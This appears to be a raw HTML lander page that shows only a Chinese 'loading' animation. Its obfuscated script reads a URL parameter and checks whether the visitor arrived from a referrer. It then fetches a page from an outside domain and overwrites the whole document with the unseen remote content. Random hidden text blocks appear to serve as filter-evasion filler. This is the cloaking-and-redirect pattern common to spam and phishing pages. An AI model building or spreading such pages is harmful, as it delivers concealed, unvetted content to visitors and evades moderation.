<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mRJjqF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mRJjqF .szXkduHFP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mRJjqF .content {
            line-height: 50px;
            text-align: center
        }

        .mRJjqF .img {
            width: 100%
        }

        .mRJjqF .lTEHea {
            text-align: center
        }

        .mRJjqF .lTEHea span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mRJjqF .lTEHea span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mRJjqF .lTEHea span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mRJjqF .lTEHea span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mRJjqF .lTEHea span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mRJjqF .lTEHea span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mRJjqF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rXa6O7Vxq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hC8Be = rXa6O7Vxq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hC8Be +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hC8Be +".html?a=share";
		}
		
        PXwNjOcPZH=url+"#"+new Date().getTime();
        PXwNjOcPZH && function() {
            $.get(PXwNjOcPZH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>AGYJGfgCo4ujBuN1NjqAC7RiQpfRBHEy7Vi3pQ3QOn5jIIjQQD</a>
<div style='display:none'>TwgYMm8kmFjuXOQ6mocoMZzArmpEb7N95tvXE26h9</div>
<b style='display:none' >i7edTAjClJWymTnyAM69XgI265dt1jCttsZ</b><div class="mRJjqF">
    <div class="szXkduHFP">
        <div class="lTEHea">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>XwG3mPHvMhQHFsQZApubeQuaaqLZzGDjx07m9Own3vv3M2LXuVqgH1MxVLeZSt0fjdDXGllDioPXimT3y9ns6mXU3jW</div>
<li style='display:none' >HbEebNqj7hTR4qYXOQq8YV</li>
<h1 style='display:none' >RgToxMjBn6huS9BiOZqqNFYRGyA33lh1SR0MF19OCXTHvN</h1>
<p  style='display:none'>XzOxLrqHTz4knijHNcZNBo3phJpLigaBgWC2YZpCutpYBpTaIr6hqdbRdtfP1KzHqwQilIxBlu00</p>
<img  src='' style='display:none'></body>
</html>